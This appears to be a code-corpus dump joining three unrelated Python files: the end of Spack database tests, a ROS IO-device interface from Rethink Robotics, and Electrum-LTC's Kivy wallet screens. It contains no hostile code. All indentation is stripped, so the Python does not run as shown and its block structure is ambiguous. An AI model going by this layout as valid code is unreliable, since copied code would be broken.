mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
# remove only dependent of uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
# Dont add any package definitions to this repository, the idea is that
# packages should not have to be defined in the repository once they
# are installed
with spack.repo.swap(MockPackageMultiRepo()):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert not rec.spec.external_modules
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert not rec.spec.external_modules
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert not rec.spec.external_modules
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check again the `installed` property
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
validate(db_obj, schema)
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
f.write(json.dumps(db_obj))
if _use_uuid:
with open(spack.store.db._verifier_path, 'w') as f:
f.write(str(uuid.uuid4()))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
# Ensure the same issue doesn't come up for virtual
# dependency that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
with pytest.raises(ValueError, match='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
# Ensure raise OSError when try to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
|
io_interface.py
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import sys
import json
import copy
import threading
import uuid
from threading import Lock
import intera_dataflow
from io_command import SetCommand
from intera_core_msgs.msg import (
IODeviceConfiguration,
IODeviceStatus,
IOComponentCommand
)
class IOInterface(object):
"""
Base class for IO interfaces.
"""
def __init__(self, path_root, config_msg_type, status_msg_type):
self._path = path_root
self.config_mutex = Lock()
self.state_mutex = Lock()
self.cmd_times = []
self.ports = dict()
self.signals = dict()
self.config = config_msg_type()
self.state = status_msg_type()
self.config_changed = intera_dataflow.Signal()
self.state_changed = intera_dataflow.Signal()
self._config_sub = rospy.Subscriber(self._path + "/config",
config_msg_type,
self.handle_config)
self._state_sub = rospy.Subscriber(self._path + "/state",
status_msg_type,
self.handle_state)
self._command_pub = rospy.Publisher(self._path + "/command",
IOComponentCommand, queue_size=10)
# Wait for the config to be populated
intera_dataflow.wait_for(
lambda: self.config is not None and self.is_config_valid(),
timeout=5.0,
timeout_msg=("Failed to get config at: {}.".format(self._path + "/config"))
)
# Wait for the state to be populated too (optional)
is_init = intera_dataflow.wait_for(
lambda: self.state is not None and self.is_state_valid(),
timeout=5.0,
raise_on_error=False
)
if not is_init:
rospy.loginfo("Did not receive initial state at: {}."
" Device may not be activated yet.".format(self._path + "/state"))
rospy.logdebug("Making new IOInterface on %s" % (self._path,))
def invalidate_config(self):
"""
mark the config topic data as invalid
"""
with self.config_mutex:
self.config.time.secs = 0
def invalidate_state(self):
"""
mark the state topic data as invalid
"""
with self.state_mutex:
self.state.time.secs = 0
def is_config_valid(self):
"""
return true if the config topic data is valid
"""
return self.config.time.secs != 0
def is_state_valid(self):
"""
return true if the state topic data is valid
"""
return self.state.time.secs != 0
def is_valid(self):
"""
return true if both the state and config topic data are valid
"""
return self.is_config_valid() and self.is_state_valid()
def revalidate(self, timeout, invalidate_state=True, invalidate_config=True):
"""
invalidate the state and config topics, then wait up to timeout
seconds for them to become valid again.
return true if both the state and config topic data are valid
"""
if invalidate_state:
self.invalidate_state()
if invalidate_config:
self.invalidate_config()
timeout_time = rospy.Time.now() + rospy.Duration(timeout)
while not self.is_state_valid() and not rospy.is_shutdown():
rospy.sleep(0.1)
if timeout_time < rospy.Time.now():
rospy.logwarn("Timed out waiting for node interface valid...")
return False
return True
def handle_config(self, msg):
"""
config topic callback
"""
if not self.config or self.time_changed(self.config.time, msg.time):
with self.config_mutex:
self.config = msg
self.config_changed()
def load_state(self, current_state, incoming_state):
for state in incoming_state:
if state.name not in current_state:
current_state[state.name] = dict()
formatting = json.loads(state.format)
current_state[state.name]["type"] = formatting["type"]
current_state[state.name]["role"] = formatting["role"]
data = json.loads(state.data)
current_state[state.name]["data"] = data[0] if len(data) > 0 else None
def handle_state(self, msg):
"""
state topic callback
"""
if not self.state or self.time_changed(self.state.time, msg.time):
with self.state_mutex:
self.state = msg
self.state_changed()
self.load_state(self.ports, self.state.ports)
self.load_state(self.signals, self.state.signals)
def publish_command(self, op, args, timeout=2.0):
"""
publish on the command topic
return true if the command is acknowleged within the timeout
"""
cmd_time = rospy.Time.now()
self.cmd_times.append(cmd_time)
self.cmd_times = self.cmd_times[-100:] # cache last 100 cmd timestamps
cmd_msg = IOComponentCommand(
time=cmd_time,
op=op,
args=json.dumps(args))
rospy.logdebug("publish_command %s %s" % (cmd_msg.op, cmd_msg.args))
if timeout != None:
timeout_time = rospy.Time.now() + rospy.Duration(timeout)
while not rospy.is_shutdown():
self._command_pub.publish(cmd_msg)
if self.is_state_valid():
if cmd_time in self.state.commands:
rospy.logdebug("command %s acknowleged" % (cmd_msg.op,))
return True
rospy.sleep(0.1)
if timeout_time < rospy.Time.now():
rospy.logwarn("Timed out waiting for command acknowlegment...")
break
return False
return True
@staticmethod
def time_changed(time1, time2):
"""
return true if the times are different
"""
return (time1.secs != time2.secs) or (time1.nsecs != time2.nsecs)
class IODeviceInterface(IOInterface):
"""
IO Device interface to config, status and command topics
"""
def __init__(self, node_name, dev_name):
super(IODeviceInterface, self).__init__(
'io/' + node_name + '/' + dev_name,
IODeviceConfiguration,
IODeviceStatus)
self._threads = dict()
self._callback_items = dict()
self._callback_functions = dict()
def list_signal_names(self):
"""
return a list of all signals
"""
with self.state_mutex:
return copy.deepcopy(self.signals.keys())
def get_signal_type(self, signal_name):
"""
return the status for the given signal, or none
"""
with self.state_mutex:
if signal_name in self.signals.keys():
return copy.deepcopy(self.signals[signal_name]['type'])
return None
def get_signal_value(self, signal_name):
"""
return the status for the given signal, or none
"""
with self.state_mutex:
if signal_name in self.signals.keys():
return copy.deepcopy(self.signals[signal_name]['data'])
return None
def set_signal_value(self, signal_name, signal_value, signal_type=None, timeout=5.0):
"""
set the value for the given signal
return True if the signal value is set, False if the requested signal is invalid
"""
if signal_name not in self.list_signal_names():
rospy.logerr("Cannot find signal '{0}' in this IO Device ({1}).".format(signal_name,
self._path))
return
if signal_type == None:
s_type = self.get_signal_type(signal_name)
if s_type == None:
rospy.logerr("Failed to get 'type' for signal '{0}'.".format(signal_name))
return
else:
s_type = signal_type
set_command = SetCommand().set_signal(signal_name, s_type, signal_value)
self.publish_command(set_command.op, set_command.args, timeout=timeout)
# make sure both state and config are valid:
self.revalidate(timeout, invalidate_state=False, invalidate_config=False)
def list_port_names(self):
"""
return a list of all ports
"""
with self.state_mutex:
return copy.deepcopy(self.ports.keys())
def get_port_type(self, port_name):
"""
return the status for the given port, or none
"""
with self.state_mutex:
if port_name in self.ports.keys():
return copy.deepcopy(self.ports[port_name]['type'])
return None
def get_port_value(self, port_name):
"""
return the status for the given port, or none
"""
with self.state_mutex:
if port_name in self.ports.keys():
return copy.deepcopy(self.ports[port_name]['data'])
return None
def set_port_value(self, port_name, port_value, port_type=None, timeout=5.0):
"""
set the value for the given port
return True if the port value is set, False if the requested port is invalid
"""
if port_name not in list_port_names():
rospy.logerr("Cannot find port '{0}' in this IO Device ({1}).".format(port_name,
self._path))
return
if port_type == None:
p_type = self.get_port_type(port_name)
if p_type == None:
rospy.logerr("Failed to get 'type' for port '{0}'.".format(port_name))
return
else:
p_type = port_type
set_command = SetCommand().set_port(port_name, p_type, port_value)
self.publish_command(set_command.op, set_command.args, timeout=timeout)
# make sure both state and config are valid:
self.revalidate(timeout, invalidate_state=False, invalidate_config=False)
def register_callback(self, callback_function, signal_name, poll_rate=10):
"""
Registers a supplied callback to a change in state of supplied
signal_name's value. Spawns a thread that will call the callback with
the updated value.
@type: function
@param: function handle for callback function
@type: str
@param: the signal name (button or wheel) to poll for value change
@type: int
@param: the rate at which to poll for a value change (in a separate
thread)
@rtype: str
@return: callback_id retuned if the callback was registered, and an
empty string if the requested signal_name does not exist in the
Navigator
"""
if signal_name in self.list_signal_names():
callback_id = uuid.uuid4()
self._callback_items[callback_id] = intera_dataflow.Signal()
def signal_spinner():
old_state = self.get_signal_value(signal_name)
r = rospy.Rate(poll_rate)
while not rospy.is_shutdown():
new_state = self.get_signal_value(signal_name)
if new_state != old_state:
self._callback_items[callback_id](new_state)
old_state = new_state
r.sleep()
self._callback_items[callback_id].connect(callback_function)
t = threading.Thread(target=signal_spinner)
t.daemon = True
t.start()
self._threads[callback_id] = t
self._callback_functions[callback_id] = callback_function
return callback_id
else:
return str()
def deregister_callback(self, callback_id):
"""
Deregisters a callback based on the supplied callback_id.
@type: str
@param: the callback_id string to deregister
@rtype: bool
@return: returns bool True if the callback was successfully
deregistered, and False otherwise.
"""
if callback_id in self._threads.keys():
self._callback_items[callback_id].disconnect(
self._callback_functions[callback_id])
return True
else:
return False
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum_ltc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_ltc import bitcoin, constants
from electrum_ltc.transaction import tx_from_any, PartialTxOutput
from electrum_ltc.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time, parse_max_spend)
from electrum_ltc.lnaddr import lndecode, LnInvoiceException
from electrum_ltc.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum_ltc.gui.kivy import KIVY_GUI_PATH
from electrum_ltc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_ltc.gui.kivy.main_window import ElectrumWindow
from electrum_ltc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff=True)
ri['base_unit'] = self.app.base_unit
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
ri['fx_ccy'] = tx_item['fiat_value'].ccy
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
# interpret as lighting URI
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
# interpret as BIP21 URI
else:
self.set_bip21(text)
def set_bip21(self, text: str):
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.app.show_info(_("Invoice is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
amount_sat = invoice.get_amount_sat()
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.app.format_amount_and_units_with_fiat(amount_sat)) +'\n'
self.app.protected(msg, self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if not any(parse_max_spend(x.value) for x in outputs) else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum_ltc.util import create_bip21_uri
amount = self.app.get_amount(self.amount)
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
